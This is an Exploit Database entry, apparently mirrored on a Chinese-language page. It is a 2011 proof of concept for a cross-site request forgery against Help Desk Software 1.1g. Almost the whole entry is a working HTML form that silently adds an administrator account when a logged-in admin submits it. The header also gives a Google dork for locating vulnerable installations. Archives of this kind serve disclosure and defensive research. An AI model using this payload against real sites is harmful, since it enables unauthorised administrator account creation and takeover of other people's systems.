Help Desk Software 1.1g – Cross-Site Request Forgery (Add Admin)

• Exploit Database
• 15 阅读

• 作者： G13
  日期： 2011-08-24
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/17714/

• # Exploit Title: Help Request System 1.1g XSRF (add admin)
  # Date: 08-23-2011
  # Google Dork: "powered by freehelpdesk.org"
  # Author: G13
  # Software link: http://freehelpdesk.org/
  # Version: 1.1g
  
  <html>
  <body>
  <form id="edit" method="post" 
  action="http://localhost/request/index.php?sub=users&action=store&type=add" 
  enctype="">
  Name: <input class="FormItemTextbox" type="text" name="user_name" 
  size="35" maxlength="" value=""><br>
  Login name:<input class="FormItemTextbox" type="text" name="user_login" 
  size="20" maxlength="" value=""><br>
  Pass:<input class="FormItemTextbox" type="password" id="user_password" 
  name="user_password" size="20" value=""><br>
  Pass confirm:<input class="FormItemTextbox" type="password" 
  id="user_password_confirm" name="user_password_confirm" size="20" 
  value=""><br>
  <input type="hidden" name="user_level" value="0">
  <input class="btn" type="submit" value="Submit" id="submit" 
  name="submit">
  </form>
  </body>